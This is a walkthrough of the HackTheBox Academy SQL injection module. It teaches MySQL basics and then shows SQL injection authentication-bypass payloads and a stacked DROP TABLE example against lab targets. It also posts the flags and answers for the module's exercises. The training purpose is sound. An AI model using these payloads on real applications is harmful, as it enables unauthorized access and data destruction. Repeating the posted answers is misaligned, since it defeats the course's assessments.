SQL Injection Fundamentals — HackTheBox ACADEMY Walkthrough

77 min readSep 9, 2024


Site Link:https://academy.hackthebox.com/module/33/section/177

Section 1 Introduction

Most modern web applications utilize a database structure on the back-end. Such databases are used to store and retrieve data related to the web application, from actual web content to user information and content, and so on. To make the web applications dynamic, the web application has to interact with the database in real-time. As HTTP(S) requests arrive from the user, the web application’s back-end will issue queries to the database to build the response. These queries can include information from the HTTP(S) request or other relevant information.

When user-supplied information is used to construct the query to the database, malicious users can trick the query into being used for something other than what the original programmer intended, providing the user access to query the database using an attack known as SQL injection (SQLi).

SQL injection refers to attacks against relational databases such as MySQL (whereas injections against non-relational databases, such as MongoDB, are NoSQL injection). This module will focus on MySQL to introduce SQL Injection concepts.

SQL Injection (SQLi)

Many types of injection vulnerabilities are possible within web applications, such as HTTP injection, code injection, and command injection. The most common example, however, is SQL injection. A SQL injection occurs when a malicious user attempts to pass input that changes the final SQL query sent by the web application to the database, enabling the user to perform other unintended SQL queries directly against the database.

There are many ways to accomplish this. To get a SQL injection to work, the attacker must first inject SQL code and then subvert the web application logic by changing the original query or executing a completely new one. First, the attacker has to inject code outside the expected user input limits, so it does not get executed as simple user input. In the most basic case, this is done by injecting a single quote () or a double quote () to escape the limits of user input and inject data directly into the SQL query.

Once an attacker can inject, they have to look for a way to execute a different SQL query. This can be done using SQL code to make up a working query that executes both the intended and the new SQL queries. There are many ways to achieve this, like using stacked queries or using Union queries. Finally, to retrieve our new query’s output, we have to interpret it or capture it on the web application’s front end.

Use Cases and Impact

A SQL injection can have a tremendous impact, especially if privileges on the back-end server and database are very lax.

First, we may retrieve secret/sensitive information that should not be visible to us, like user logins and passwords or credit card information, which can then be used for other malicious purposes. SQL injections cause many password and data breaches against websites, which are then re-used to steal user accounts, access other services, or perform other nefarious actions.

Another use case of SQL injection is to subvert the intended web application logic. The most common example of this is bypassing login without passing a valid pair of username and password credentials. Another example is accessing features that are locked to specific users, like admin panels. Attackers may also be able to read and write files directly on the back-end server, which may, in turn, lead to placing back doors on the back-end server, and gaining direct control over it, and eventually taking control over the entire website.


SQL injections are usually caused by poorly coded web applications or poorly secured back-end server and databases privileges. Later on, we will discuss ways to reduce the chances of being vulnerable to SQL injections through secure coding methods like user input sanitization and validation and proper back-end user privileges and control.


Section 2 Intro to Databases

Before we learn about SQL injections, we need to learn more about databases and Structured Query Language (SQL), which databases will perform the necessary queries. Web applications utilize back-end databases to store various content and information related to the web application. This can be core web application assets like images and files, content like posts and updates, or user data like usernames and passwords.

There are many different types of databases, each of which fits a particular type of use. Traditionally, an application used file-based databases, which was very slow with the increase in size. This led to the adoption of Database Management Systems (DBMS).

Database Management Systems

A Database Management System (DBMS) helps create, define, host, and manage databases. Various kinds of DBMS were designed over time, such as file-based, Relational DBMS (RDBMS), NoSQL, Graph based, and Key/Value stores.

There are multiple ways to interact with a DBMS, such as command-line tools, graphical interfaces, or even APIs (Application Programming Interfaces). DBMS is used in various banking, finance, and education sectors to record large amounts of data. Some of the essential features of a DBMS include:


The diagram below details a two-tiered architecture.

Tier I usually consists of client-side applications such as websites or GUI programs. These applications consist of high-level interactions such as user login or commenting. The data from these interactions is passed to Tier II through API calls or other requests.

The second tier is the middleware, which interprets these events and puts them in a form required by the DBMS. Finally, the application layer uses specific libraries and drivers based on the type of DBMS to interact with them. The DBMS receives queries from the second tier and performs the requested operations. These operations could include insertion, retrieval, deletion, or updating of data. After processing, the DBMS returns any requested data or error codes in the event of invalid queries.

It is possible to host the application server as well as the DBMS on the same host. However, databases with large amounts of data supporting many users are typically hosted separately to improve performance and scalability.

Section 3 Types of Databases

Databases, in general, are categorized into Relational Databases and Non-Relational Databases. Only Relational Databases utilize SQL, while Non-Relational databases utilize a variety of methods for communications.

Relational Databases

A relational database is the most common type of database. It uses a schema, a template, to dictate the data structure stored in the database. For example, we can imagine a company that sells products to its customers having some form of stored knowledge about where those products go, to whom, and in what quantity. However, this is often done in the back-end and without obvious informing in the front-end. Different types of relational databases can be used for each approach. For example, the first table can store and display basic customer information, the second the number of products sold and their cost, and the third table to enumerate who bought those products and with what payment data.

Tables in a relational database are associated with keys that provide a quick database summary or access to the specific row or column when specific data needs to be reviewed. These tables, also called entities, are all related to each other. For example, the customer information table can provide each customer with a specific ID that can indicate everything we need to know about that customer, such as an address, name, and contact information. Also, the product description table can assign a specific ID to each product. The table that stores all orders would only need to record these IDs and their quantity. Any change in these tables will affect all of them but predictably and systematically.

However, when processing an integrated database, a concept is required to link one table to another using its key, called a relational database management system (RDBMS). Many companies that initially use different concepts are switching to the RDBMS concept because this concept is easy to learn, use and understand. Initially, this concept was used only by large companies. However, many types of databases now implement the RDBMS concept, such as Microsoft Access, MySQL, SQL Server, Oracle, PostgreSQL, and many others.

For example, we can have a users table in a relational database containing columns like id, username, first_name, last_name, and others. The id can be used as the table key. Another table, posts, may contain posts made by all users, with columns like id, user_id, date, content, and so on.

We can link the id from the users table to the user_id in the posts table to retrieve the user details for each post without storing all user details with each post. A table can have more than one key, as another column can be used as a key to link with another table. So, for example, the id column can be used as a key to link the posts table to another table containing comments, each of which belongs to a particular post, and so on.

This way, by using relational databases, it becomes rapid and easy to retrieve all data about a particular element from all databases. So, for example, we can retrieve all details linked to a specific user from all tables with a single query. This makes relational databases very fast and reliable for big datasets with clear structure and design and efficient data management. The most common example of relational databases is MySQL, which we will be covering in this module.

Non-relational Databases

A non-relational database (also called a NoSQL database) does not use tables, rows, and columns or prime keys, relationships, or schemas. Instead, a NoSQL database stores data using various storage models, depending on the type of data stored. Due to the lack of a defined structure for the database, NoSQL databases are very scalable and flexible. Therefore, when dealing with datasets that are not very well defined and structured, a NoSQL database would be the best choice for storing such data. There are four common storage models for NoSQL databases:


Each of the above models has a different way of storing data. For example, the Key-Value model usually stores data in JSON or XML, and have a key for each pair, and stores all of its data as its value:

The above example can be represented using JSON as:

"100001": {
"date": "01-01-2021",
"content": "Welcome to this web application."
"100002": {
"date": "02-01-2021",
"content": "This is the first post on this web app."
"100003": {
"date": "02-01-2021",
"content": "Reminder: Tomorrow is the ..."

It looks similar to a dictionary item in languages like Python or PHP (i.e. {‘key’:’value’}), where the key is usually a string, and the value can be a string, dictionary, or any class object.

The most common example of a NoSQL database is MongoDB.


Section 4 Intro to MySQL

This module introduces SQL injection through MySQL, and it is crucial to learn more about MySQL and SQL to understand how SQL injections work and utilize them properly. Therefore, this section will cover some of MySQL/SQL’s basics and syntax and examples used within MySQL/MariaDB databases.
Structured Query Language (SQL)

SQL syntax can differ from one RDBMS to another. However, they are all required to follow the ISO standard for Structured Query Language. We will be following the MySQL/MariaDB syntax for the examples shown. SQL can be used to perform the following actions:

Retrieve data
Update data
Delete data
Create new tables and databases
Add / remove users
Assign permissions to these users

Command Line

The mysql utility is used to authenticate to and interact with a MySQL/MariaDB database. The -u flag is used to supply the username and the -p flag for the password. The -p flag should be passed empty, so we are prompted to enter the password and do not pass it directly on the command line since it could be stored in cleartext in the bash_history file.

mysql -u root -p

Again, it is also possible to use the password directly in the command, though this should be avoided, as it could lead to the password being kept in logs and terminal history:

mysql -u root -p<password>

The examples above log us in as the superuser, i.e.,”root” with the password “password,” to have privileges to execute all commands. Other DBMS users would have certain privileges to which statements they can execute. We can view which privileges we have using the SHOW GRANTS command which we will be discussing later.

When we do not specify a host, it will default to the localhost server. We can specify a remote host and port using the -h and -P flags.

mysql -u root -h docker.hackthebox.eu -P 3306 -p

Creating a database

Once we log in to the database using the mysql utility, we can start using SQL queries to interact with the DBMS. For example, a new database can be created within the MySQL DBMS using the CREATE DATABASE statement.
Intro to MySQL


MySQL expects command-line queries to be terminated with a semi-colon. The example above created a new database named users. We can view the list of databases with SHOW DATABASES, and we can switch to the users database with the USE statement:



DBMS stores data in the form of tables. A table is made up of horizontal rows and vertical columns. The intersection of a row and a column is called a cell. Every table is created with a fixed set of columns, where each column is of a particular data type.

A data type defines what kind of value is to be held by a column. Common examples are numbers, strings, date, time, and binary data. There could be data types specific to DBMS as well. A complete list of data types in MySQL can be found here. For example, let us create a table named logins to store user data, using the CREATE TABLE SQL query:

id INT,
username VARCHAR(100),
password VARCHAR(100),
date_of_joining DATETIME

As we can see, the CREATE TABLE query first specifies the table name, and then (within parentheses) we specify each column by its name and its data type, all being comma separated. After the name and type, we can specify specific properties, as will be discussed later.

mysql> CREATE TABLE logins (
-> id INT,
-> username VARCHAR(100),
-> password VARCHAR(100),
-> date_of_joining DATETIME
-> );

The SQL queries above create a table named logins with four columns. The first column, id is an integer. The following two columns, username and password are set to strings of 100 characters each. Any input longer than this will result in an error. The date_of_joining column of type DATETIME stores the date when an entry was added.
Intro to MySQL


A list of tables in the current database can be obtained using the SHOW TABLES statement. In addition, the DESCRIBE keyword is used to list the table structure with its fields and data types.
Intro to MySQL

DESCRIBE logins;

Table Properties

Within the CREATE TABLE query, there are many properties that can be set for the table and each column. For example, we can set the id column to auto-increment using the AUTO_INCREMENT keyword, which automatically increments the id by one every time a new item is added to the table:


The NOT NULL constraint ensures that a particular column is never left empty ‘i.e., required field.’ We can also use the UNIQUE constraint to ensures that the inserted item are always unique. For example, if we use it with the username column, we can ensure that no two users will have the same username:


Another important keyword is the DEFAULT keyword, which is used to specify the default value. For example, within the date_of_joining column, we can set the default value to Now(), which in MySQL returns the current date and time:

date_of_joining DATETIME DEFAULT NOW(),

Finally, one of the most important properties is PRIMARY KEY, which we can use to uniquely identify each record in the table, referring to all data of a record within a table for relational databases, as previously discussed in the previous section. We can make the id column the PRIMARY KEY for this table:


The final CREATE TABLE query will be as follows:

password VARCHAR(100) NOT NULL,
date_of_joining DATETIME DEFAULT NOW(),


Answer the question(s) below to complete this Section and earn cubes!

Target(s): Click here to spawn the target system!

Authenticate to with user “root” and password “password”
Connect to the database using the MySQL client from the command line (Hint Make sure to specify the non-default MySQL port in your command).

mysql -u root -h <Target System ip>-P <Port> -p
  • mysql: This is the MySQL client command to connect to the database.
  • -u root: Specifies the username, in this case, root, which is the MySQL administrator account.
  • -h <Target System ip>: Specifies the remote host IP address.
  • -P <Port>: Specifies the port number for the MySQL service on the remote server. The standard MySQL port is 3306, but here you're connecting to 32267.
  • -p: Prompts for the password after running the command. This option ensures the password is not visible in the command line for security reasons.

Now use the ‘show databases;’ command to list databases in the DBMS.

show databases;

What is the name of the first database?

Answer: employees

Section 5 SQL Statements

Now that we understand how to use the mysql utility and create databases and tables, let us look at some of the essential SQL statements and their uses.

INSERT Statement

The INSERT statement is used to add new records to a given table. The statement following the below syntax:

INSERT INTO table_name VALUES (column1_value, column2_value, column3_value, …);

The syntax above requires the user to fill in values for all the columns present in the table.

INSERT INTO logins VALUES(1, 'admin', 'p@ssw0rd', '2020–07–02');

The example above shows how to add a new login to the logins table, with appropriate values for each column. However, we can skip filling columns with default values, such as id and date_of_joining. This can be done by specifying the column names to insert values into a table selectively:

INSERT INTO table_name(column2, column3, …) VALUES (column2_value, column3_value, …);

We can do the same to insert values into the logins table:

INSERT INTO logins(username, password) VALUES('administrator', 'adm1n_p@ss');

We inserted a username-password pair in the example above while skipping the id and date_of_joining columns.

We can also insert multiple records at once by separating them with a comma:

INSERT INTO logins(username, password) VALUES ('john', 'john123!'), ('tom', 'tom123!');

The query above inserted two new records at once.

SELECT Statement

Now that we have inserted data into tables let us see how to retrieve data with the SELECT statement. This statement can also be used for many other purposes, which we will come across later. The general syntax to view the entire table is as follows:

SELECT * FROM table_name;

The asterisk symbol (*) acts as a wildcard and selects all the columns. The FROM keyword is used to denote the table to select from. It is possible to view data present in specific columns as well:

SELECT column1, column2 FROM table_name;

The query above will select data present in column1 and column2 only.

mysql> SELECT * FROM logins;
SELECT username,password FROM logins;

The first query in the example above looks at all records present in the logins table. We can see the four records which were entered before. The second query selects just the username and password columns while skipping the other two.

DROP Statement

We can use DROP to remove tables and databases from the server.

DROP TABLE logins;

As we can see, the table was removed entirely.

ALTER Statement

Finally, We can use ALTER to change the name of any table and any of its fields or to delete or add a new column to an existing table. The below example adds a new column newColumn to the logins table using ADD:

ALTER TABLE logins ADD newColumn INT;

To rename a column, we can use RENAME COLUMN:
SQL Statements

ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn;

We can also change a column’s datatype with MODIFY:
SQL Statements


Finally, we can drop a column using DROP:

ALTER TABLE logins DROP oldColumn;

We can use any of the above statements with any existing table, as long as we have enough privileges to do so.

UPDATE Statement

While ALTER is used to change a table’s properties, the UPDATE statement can be used to update specific records within a table, based on certain conditions. Its general syntax is:

UPDATE table_name SET column1=newvalue1, column2=newvalue2, … WHERE <condition>;

We specify the table name, each column and its new value, and the condition for updating records. Let us look at an example:

UPDATE logins SET password = 'change_password' WHERE id > 1;
SELECT * FROM logins;

The query above updated all passwords in all records where the id was more significant than 1.


Answer the question(s) below to complete this Section and earn cubes!

Target(s): Click here to spawn the target system!

Authenticate to with user “root” and password “password”

What is the department number for the ‘Development’ department? (Hint

View records under the ‘departments’ table).

Start with authenticate to with user “root” and password “password”

mysql -u root -h <Target system IP>-P <Port Namber> -p
  • mysql: This is the command to invoke the MySQL client, which allows you to interact with the MySQL database.
  • -u root: Specifies that you want to connect using the root user.
  • -h <Target system IP>: The -h flag is used to specify the hostname or IP address of the MySQL server you're trying to connect to.
  • -P <Port Namber>: This specifies the port number that the MySQL server is listening on.
  • -p: This prompts you for the password of the root user after hitting enter.
    What is the department number for the ‘Development’ department? (Hint View records under the ‘departments’ table).
USE employees;

To find what is the department number for the ‘Development’ department?

SELECT * FROM departments;

Answer: d005

Section 6 Query Results

In this section, we will learn how to control the results output of any query.
Sorting Results

We can sort the results of any query using ORDER BY and specifying the column to sort by:

SELECT * FROM logins ORDER BY password;

By default, the sort is done in ascending order, but we can also sort the results by ASC or DESC:

It is also possible to sort by multiple columns, to have a secondary sort for duplicate values in one column:

SELECT * FROM logins ORDER BY password DESC, id ASC;

LIMIT results

In case our query returns a large number of records, we can LIMIT the results to what we want only, using LIMIT and the number of records we want:


If we wanted to LIMIT results with an offset, we could specify the offset before the LIMIT count:

SELECT * FROM logins LIMIT 1, 2;

WHERE Clause

To filter or search for specific data, we can use conditions with the SELECT statement using the WHERE clause, to fine-tune the results:

SELECT * FROM table_name WHERE <condition>;

The query above will return all records which satisfy the given condition. Let us look at an example:

SELECT * FROM logins WHERE id > 1;

The example above selects all records where the value of id is greater than 1. As we can see, the first row with its id as 1 was skipped from the output. We can do something similar for usernames:

SELECT * FROM logins where username = 'admin';

The query above selects the record where the username is admin. We can use the UPDATE statement to update certain records that meet a specific condition.

LIKE Clause

Another useful SQL clause is LIKE, enabling selecting records by matching a certain pattern. The query below retrieves all records with usernames starting with admin:

SELECT * FROM logins WHERE username LIKE 'admin%';

The % symbol acts as a wildcard and matches all characters after admin. It is used to match zero or more characters. Similarly, the _ symbol is used to match exactly one character. The below query matches all usernames with exactly three characters in them, which in this case was tom:

SELECT * FROM logins WHERE username like '___';


Answer the question(s) below to complete this Section and earn cubes!

Target(s): Click here to spawn the target system!

Authenticate to with user “root” and password “password”

What is the last name of the employee whose first name starts with “Bar” AND who was hired on 1990–01–01? (Hint Use AND operator).

Start with authenticate to with user “root” and password “password”

mysql -u root -h <Target system IP>-P <Port Namber> -p
  • mysql: This is the command to invoke the MySQL client, which allows you to interact with the MySQL database.
  • -u root: Specifies that you want to connect using the root user.
  • -h <Target system IP>: The -h flag is used to specify the hostname or IP address of the MySQL server you're trying to connect to.
  • -P <Port Namber>: This specifies the port number that the MySQL server is listening on.
  • -p: This prompts you for the password of the root user after hitting enter.

What is the last name of the employee whose first name starts with “Bar” AND who was hired on 1990–01–01? (Hint Use AND operator)

we need first display a list of all databases in MySQL that the user has permission to view.

Show databases;

Now we want a list of tables within the current database

SHOW tables;

Now to find the last name of the employee whose first name starts with “Bar” AND who was hired on 1990–01–01

SELECT * FROM <Databases Name> WHERE first_name like '<starts with>%' AND hire_date = '<Date>';

Answer: Mitchem

Section 7 SQL Operators

Sometimes, expressions with a single condition are not enough to satisfy the user’s requirement. For that, SQL supports Logical Operators to use multiple conditions at once. The most common logical operators are AND, OR, and NOT.

AND Operator

The AND operator takes in two conditions and returns true or false based on their evaluation:

condition1 AND condition2

The result of the AND operation is true if and only if both condition1 and condition2 evaluate to true:

SELECT 1 = 1 AND 'test' = 'test';
SELECT 1 = 1 AND 'test' = 'abc';

In MySQL terms, any non-zero value is considered true, and it usually returns the value 1 to signify true. 0 is considered false. As we can see in the example above, the first query returned true as both expressions were evaluated as true. However, the second query returned false as the second condition ‘test’ = ‘abc’ is false.

OR Operator

The OR operator takes in two expressions as well, and returns true when at least one of them evaluates to true:

SELECT 1 = 1 OR 'test' = 'abc';
SELECT 1 = 2 OR 'test' = 'abc';

The queries above demonstrate how the OR operator works. The first query evaluated to true as the condition 1 = 1 is true. The second query has two false conditions, resulting in false output.

NOT Operator

The NOT operator simply toggles a boolean value ‘i.e. true is converted to false and vice versa’:


As seen in the examples above, the first query resulted in false because it is the inverse of the evaluation of 1 = 1, which is true, so its inverse is false. On the other hand, the second was query returned true, as the inverse of 1 = 2 ‘which is false’ is true.

Symbol Operators

The AND, OR and NOT operators can also be represented as &&, || and !, respectively. The below are the same previous examples, by using the symbol operators:

SELECT 1 = 1 && 'test' = 'abc';
SELECT 1 = 1 || 'test' = 'abc';
SELECT 1 != 1;

Operators in queries

Let us look at how these operators can be used in queries. The following query lists all records where the username is NOT john:

SELECT * FROM logins WHERE username != 'john';

The next query selects users who have their id greater than 1 AND username NOT equal to john:

SELECT * FROM logins WHERE username != 'john' AND id > 1;

Multiple Operator Precedence

SQL supports various other operations such as addition, division as well as bitwise operations. Thus, a query could have multiple expressions with multiple operations at once. The order of these operations is decided through operator precedence.

Here is a list of common operations and their precedence, as seen in the MariaDB Documentation:

Division (/), Multiplication (*), and Modulus (%)
Addition (+) and subtraction (-)
Comparison (=, >, <, <=, >=, !=, LIKE)
NOT (!)
AND (&&)
OR (||)

Operations at the top are evaluated before the ones at the bottom of the list. Let us look at an example:

SELECT * FROM logins WHERE username != 'tom' AND id > 3 - 2;

The query has four operations: !=, AND, >, and -. From the operator precedence, we know that subtraction comes first, so it will first evaluate 3–2 to 1:

SELECT * FROM logins WHERE username != 'tom' AND id > 1;

Next, we have two comparison operations, > and !=. Both of these are of the same precedence and will be evaluated together. So, it will return all records where username is not tom, and all records where the id is greater than 1, and then apply AND to return all records with both of these conditions:

select * from logins where username != 'tom' AND id > 3 - 2;

We will see a few other scenarios of operator precedence in the upcoming sections.


Answer the question(s) below to complete this Section and earn cubes!

Target(s): Click here to spawn the target system!

Authenticate to with user “root” and password “password”

In the ‘titles’ table, what is the number of records WHERE the employee number is greater than 10000 OR their title does NOT contain ‘engineer’? (Hint Use OR/NOT conditions. Use ‘describe titles;’ to get the necessary column names).

Start with authenticate to with user “root” and password “password”

mysql -u root -h <Target system IP>-P <Port Namber> -p
  • mysql: This is the command to invoke the MySQL client, which allows you to interact with the MySQL database.
  • -u root: Specifies that you want to connect using the root user.
  • -h <Target system IP>: The -h flag is used to specify the hostname or IP address of the MySQL server you're trying to connect to.
  • -P <Port Namber>: This specifies the port number that the MySQL server is listening on.
  • -p: This prompts you for the password of the root user after hitting enter.
    What is the department number for the ‘Development’ department? (Hint View records under the ‘departments’ table).

In the ‘titles’ table, what is the number of records WHERE the employee number is greater than 10000 OR their title does NOT contain ‘engineer’?

First, return all the rows and columns from the titles table:

SELECT * FROM <Table Name>;

Now to find In the ‘titles’ table, what is the number of records WHERE the employee number is greater than 10000 OR their title does NOT contain ‘engineer’?

SELECT * FROM titles WHERE emp_no > 10000 OR title != 'engineer';
  • SELECT *: Selects all columns from the table.
  • FROM titles: Specifies the table from which to retrieve the data (titles).
  • WHERE emp_no > 10000: Filters the rows where emp_no (employee number) is greater than 10,000.
  • OR title != ‘engineer’: Includes rows where the title is not ‘engineer’.

This query gave the result of all rows where either the emp_no is greater than 10,000 or the title is not ‘engineer’.

All are over 10000 and we need or the title is not ‘engineer’.

Answer: 654

SQL Injections

Section 8 Intro to SQL Injections

Now that we have a general idea of how MySQL and SQL queries work let us learn about SQL injections.
Use of SQL in Web Applications

First, let us see how web applications use databases MySQL, in this case, to store and retrieve data. Once a DBMS is installed and set up on the back-end server and is up and running, the web applications can start utilizing it to store and retrieve data.

For example, within a PHP web application, we can connect to our database, and start using the MySQL database through MySQL syntax, right within PHP, as follows:

Then, the query’s output will be stored in $result, and we can print it to the page or use it in any other way. The below PHP code will print all returned results of the SQL query in new lines:

Web applications also usually use user-input when retrieving data. For example, when a user uses the search function to search for other users, their search input is passed to the web application, which uses the input to search within the databases:

If we use user-input within an SQL query, and if not securely coded, it may cause a variety of issues, like SQL Injection vulnerabilities.

What is an Injection?

In the above example, we accept user input and pass it directly to the SQL query without sanitization.

SQL Injection

An SQL injection occurs when user-input is inputted into the SQL query string without properly sanitizing or filtering the input. The previous example showed how user-input can be used within an SQL query, and it did not use any form of input sanitization:

In typical cases, the searchInput would be inputted to complete the query, returning the expected outcome. Any input we type goes into the following SQL query:

select * from logins where username like '%$searchInput'

So, if we input admin, it becomes ‘%admin’. In this case, if we write any SQL code, it would just be considered as a search term. For example, if we input SHOW DATABASES;, it would be executed as ‘%SHOW DATABASES;’ The web application will search for usernames similar to SHOW DATABASES;. However, as there is no sanitization, in this case, we can add a single quote (‘), which will end the user-input field, and after it, we can write actual SQL code. For example, if we search for 1’; DROP TABLE users;, the search input would be:

So, the final SQL query executed would be as follows:

select * from logins where username like '%1'; DROP TABLE users;'

As we can see from the syntax highlighting, we can escape the original query’s bounds and have our newly injected query execute as well. Once the query is run, the users table will get deleted.

Syntax Errors

The previous example of SQL injection would return an error:

This is because of the last trailing character, where we have a single extra quote (‘) that is not closed, which causes a SQL syntax error when executed:

select * from logins where username like '%1'; DROP TABLE users;'

In this case, we had only one trailing character, as our input from the search query was near the end of the SQL query. However, the user input usually goes in the middle of the SQL query, and the rest of the original SQL query comes after it.

To have a successful injection, we must ensure that the newly modified SQL query is still valid and does not have any syntax errors after our injection. In most cases, we would not have access to the source code to find the original SQL query and develop a proper SQL injection to make a valid SQL query. So, how would we be able to inject into the SQL query then successfully?

One answer is by using comments, and we will discuss this in a later section. Another is to make the query syntax work by passing in multiple single quotes, as we will discuss next (‘).

Now that we understand SQL injections’ basics let us start learning some practical uses.

Types of SQL Injections

SQL Injections are categorized based on how and where we retrieve their output.

In simple cases, the output of both the intended and the new query may be printed directly on the front end, and we can directly read it. This is known as In-band SQL injection, and it has two types: Union Based and Error Based.

With Union Based SQL injection, we may have to specify the exact location, ‘i.e., column’, which we can read, so the query will direct the output to be printed there. As for Error Based SQL injection, it is used when we can get the PHP or SQL errors in the front-end, and so we may intentionally cause an SQL error that returns the output of our query.

In more complicated cases, we may not get the output printed, so we may utilize SQL logic to retrieve the output character by character. This is known as Blind SQL injection, and it also has two types: Boolean Based and Time Based.

With Boolean Based SQL injection, we can use SQL conditional statements to control whether the page returns any output at all, ‘i.e., original query response,’ if our conditional statement returns true. As for Time Based SQL injections, we use SQL conditional statements that delay the page response if the conditional statement returns true using the Sleep() function.

Finally, in some cases, we may not have direct access to the output whatsoever, so we may have to direct the output to a remote location, ‘i.e., DNS record,’ and then attempt to retrieve it from there. This is known as Out-of-band SQL injection.

In this module, we will only be focusing on introducing SQL injections through learning about Union Based SQL injection.

Section 9 Subverting Query Logic

Now that we have a basic idea about how SQL statements work let us get started with SQL injection. Before we start executing entire SQL queries, we will first learn to modify the original query by injecting the OR operator and using SQL comments to subvert the original query’s logic. A basic example of this is bypassing web authentication, which we will demonstrate in this section.
Authentication Bypass

Consider the following administrator login page.

We can log in with the administrator credentials admin / p@ssw0rd.

The page also displays the SQL query being executed to understand better how we will subvert the query logic. Our goal is to log in as the admin user without using the existing password. As we can see, the current SQL query being executed is:

The page takes in the credentials, then uses the AND operator to select records matching the given username and password. If the MySQL database returns matched records, the credentials are valid, so the PHP code would evaluate the login attempt condition as true. If the condition evaluates to true, the admin record is returned, and our login is validated. Let us see what happens when we enter incorrect credentials.

As expected, the login failed due to the wrong password leading to a false result from the AND operation.

SQLi Discovery

Before we start subverting the web application’s logic and attempting to bypass the authentication, we first have to test whether the login form is vulnerable to SQL injection. To do that, we will try to add one of the below payloads after our username and see if it causes any errors or changes how the page behaves:

So, let us start by injecting a single quote:

We see that a SQL error was thrown instead of the Login Failed message. The page threw an error because the resulting query was:

As discussed in the previous section, the quote we entered resulted in an odd number of quotes, causing a syntax error. One option would be to comment out the rest of the query and write the remainder of the query as part of our injection to form a working query. Another option is to use an even number of quotes within our injected query, such that the final query would still work.

OR Injection

We would need the query always to return true, regardless of the username and password entered, to bypass the authentication. To do this, we can abuse the OR operator in our SQL injection.

As previously discussed, the MySQL documentation for operation precedence states that the AND operator would be evaluated before the OR operator. This means that if there is at least one TRUE condition in the entire query along with an OR operator, the entire query will evaluate to TRUE since the OR operator returns TRUE if one of its operands is TRUE.

An example of a condition that will always return true is ‘1’=’1'. However, to keep the SQL query working and keep an even number of quotes, instead of using (‘1’=’1'), we will remove the last quote and use (‘1’=’1), so the remaining single quote from the original query would be in its place.

So, if we inject the below condition and have an OR operator between it and the original condition, it should always return true:

admin' or '1'='1

The final query should be as follow:

This means the following:

If username is admin

If 1=1 return true ‘which always returns true
If password is something

The AND operator will be evaluated first, and it will return false. Then, the OR operator would be evalutated, and if either of the statements is true, it would return true. Since 1=1 always returns true, this query will return true, and it will grant us access.

Auth Bypass with OR operator

Let us try this as the username and see the response.

We were able to log in successfully as admin. However, what if we did not know a valid username? Let us try the same request with a different username this time.

The login failed because notAdmin does not exist in the table and resulted in a false query overall.

To successfully log in once again, we will need an overall true query. This can be achieved by injecting an OR condition into the password field, so it will always return true. Let us try something’ or ‘1’=’1 as the password.

The additional OR condition resulted in a true query overall, as the WHERE clause returns everything in the table, and the user present in the first row is logged in. In this case, as both conditions will return true, we do not have to provide a test username and password and can directly start with the ‘ injection and log in with just ‘ or ‘1’ = ‘1.

This works since the query evaluate to true irrespective of the username or password.


Answer the question(s) below to complete this Section and earn cubes!

Target(s): Click here to spawn the target system!

Try to log in as the user ‘tom’. What is the flag value shown after you successfully log in? (Hint Check the cheatsheet for the payload needed).

Start with opening a web browser and enter: http:// <target system Ip>: <port>

Try to log in as the user ‘tom’.

Username: tom' or '1'='1
Password: whatever we want

Result is successful we now login as user: tom

What is the flag value shown after you successfully log in?

Answer: 202a1d1a8b195d5e9a57e434cc16000c

Section 10 Using Comments

This section will learn how to use comments to subvert the logic of more advanced SQL queries and end up with a working SQL query to bypass the login authentication process.


Just like any other language, SQL allows the use of comments as well. Comments are used to document queries or ignore a certain part of the query. We can use two types of line comments with MySQL and #, in addition to an in-line comment /**/ (though this is not usually used in SQL injections). The — can be used as follows:

The # symbol can be used as well.

The server will ignore the part of the query with AND password = ‘something’ during evaluation.

Auth Bypass with comments

Let us go back to our previous example and inject admin’ — as our username. The final query will be:

As we can see from the syntax highlighting, the username is now admin, and the remainder of the query is now ignored as a comment. Also, this way, we can ensure that the query does not have any syntax issues.

Let us try using these on the login page, and log in with the username admin’ — and anything as the password:

As we see, we were able to bypass the authentication, as the new modified query checks for the username, with no other conditions.

Another Example

SQL supports the usage of parenthesis if the application needs to check for particular conditions before others. Expressions within the parenthesis take precedence over other operators and are evaluated first. Let us look at a scenario like this:

The above query ensures that the user’s id is always greater than 1, which will prevent anyone from logging in as admin. Additionally, we also see that the password was hashed before being used in the query. This will prevent us from injecting through the password field because the input is changed to a hash.

Let us try logging in with valid credentials admin / p@ssw0rd to see the response.

As expected, the login failed even though we supplied valid credentials because the admin’s ID equals 1. So let us try logging in with the credentials of another user, such as tom.

Logging in as the user with an id not equal to 1 was successful. So, how can we log in as the admin? We know from the previous section on comments that we can use them to comment out the rest of the query. So, let us try using admin’ — as the username.

The login failed due to a syntax error, as a closed one did not balance the open parenthesis. To execute the query successfully, we will have to add a closing parenthesis. Let us try using the username admin’) — to close and comment out the rest.

he query was successful, and we logged in as admin. The final query as a result of our input is:

SELECT * FROM logins where (username='admin')

The query above is like the one from the previous example and returns the row containing admin.


Answer the question(s) below to complete this Section and earn cubes!

Target(s): Click here to spawn the target system!

Login as the user with the id 5 to get the flag (Hint Look at what the original query is doing, and try to inject a payload that changes its logic, and always logs is as user id 5 to get the flag (Hint Look at what the original query is doing, and try to inject a payload that changes its logic, and always logs is as user id 5. Hint 2: use OR.).

Start at opening a web browser and enter: http:// <target system Ip>: <port>

Enter whatever you want at the Username field and password to see the actual query

In the error result we can see the query SELECT * FROM logins WHERE (username=’user’ AND id > 1) AND password = ‘81dc9bdb52d04dc20036dbd8313ed055’;

Now we will try to bypass authentication by entering

'or id=5)#
password enter whatever you want
  • The condition or id=5 checks if the id field is equal to 5.
  • The # symbol is a comment in SQL, meaning anything after this symbol is ignored by the database.
  • If the id value in the database is 5 or the condition is manipulated to always be true, this payload would essentially bypass any other conditions in the original query.

What is the user with the id 5 flag?

Answer: cdad9ecdf6f14b45ff5c4de32909caec

Section 11 Union Clause

So far, we have only been manipulating the original query to subvert the web application logic and bypass authentication, using the OR operator and comments. However, another type of SQL injection is injecting entire SQL queries executed along with the original query. This section will demonstrate this by using the MySQL Union clause to do SQL Union Injection.


Before we start learning about Union Injection, we should first learn more about the SQL Union clause. The Union clause is used to combine results from multiple SELECT statements. This means that through a UNION injection, we will be able to SELECT and dump data from all across the DBMS, from multiple tables and databases. Let us try using the UNION operator in a sample database. First, let us see the content of the ports table:

SELECT * FROM ports;

Next, let us see the output of the ships tables:

SELECT * FROM ships;

Now, let us try to use UNION to combine both results:


As we can see, UNION combined the output of both SELECT statements into one, so entries from the ports table and the ships table were combined into a single output with four rows. As we can see, some of the rows belong to the ports table while others belong to the ships table.

Note: The data types of the selected columns on all positions should be the same.

